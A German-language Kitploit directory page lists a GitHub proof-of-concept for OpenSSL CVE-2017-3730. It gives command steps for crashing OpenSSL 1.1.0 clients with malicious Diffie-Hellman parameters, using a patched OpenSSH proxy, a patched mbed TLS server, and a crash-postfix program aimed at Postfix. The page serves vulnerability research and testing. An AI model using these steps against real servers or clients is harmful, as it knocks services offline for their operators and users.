Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2017-3730 — OpenSSL CVE-2017-3730 proof-of-concept | Kitploit
Tools/GitHubGitHub/olivierh59500/cve-2017-3730
Vulnerability AnalysisExploitationNetwork SecurityCryptographyPenetration TestingBinary Exploitation
GitHubolivierh59500/cve-2017-3730

CVE-2017-3730

OpenSSL CVE-2017-3730 proof-of-concept

Repository anzeigen
5vor 9 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2017-3730

OpenSSL CVE-2017-3730 Proof-of-Concept

OpenSSH als Proxy verwenden, um DH-Werte im laufenden Betrieb zu manipulieren

  • Erstellen Sie einen SSL-Server, der eine Ciphersuite wie DHE-PSK-WITH-AES-256-GCM-SHA384 verwendet. Angenommen, er läuft auf 10.0.2.2 Port 8899
  • Holen Sie sich openssh-7.4p1
  • Wenden Sie den Patch an
  • Bauen Sie es
  • Führen Sie es aus wie:
root@kitploit:~
./ssh -vvv -N -D 1085 -o TCPKeepAlive=yes -o ServerAliveInterval=60 localhost
  • Erstellen Sie in einem anderen Terminal eine Datei ~/.tsocks.conf mit folgendem Inhalt:
root@kitploit:~
server = 127.0.0.1
server_port = 1085
server_type = 5
local = 127.0.0.0/255.255.255.0
  • ```export TSOCKS_CONF_FILE=`realpath ~/.tsocks.conf````
  • tsocks
  • Dadurch wird eine Shell erstellt, in der der gesamte Netzwerkverkehr durch unseren "bösen" Proxy fließt
  • openssl s_client -connect 10.0.2.2:8899 -psk AA
  • Absturz

Mbed TLS modifizieren, um ungültige DH-Parameter zu liefern

  • Holen Sie sich https://github.com/ARMmbed/mbedtls/archive/mbedtls-2.4.1.tar.gz
  • Wenden Sie mbedtls-2.4.1-patch.txt an
  • make -j4 programs
  • Server starten: programs/ssl/ssl_server2 force_ciphersuite=TLS-DHE-RSA-WITH-AES-256-GCM-SHA384
  • Mit OpenSSL 1.1.0-Client verbinden
  • Absturz

Postfix aus der Ferne zum Absturz bringen

  • Postfix mit OpenSSL 1.1.0 kompilieren
  • crash-postfix.c gegen das GEPATCHTE mbed TLS kompilieren (siehe oben)
  • Ich habe Postfix in einer VM ausgeführt und crash-postfix auf dem Host laufen lassen:
  • iptables -t nat -A OUTPUT -p tcp --dport 25 -j DNAT --to-destination 10.0.2.2:8888
  • crash-postfix starten
  • Postfix ausführen: posttls-finger 10.0.2.2
  • Absturz
Tool herunterladen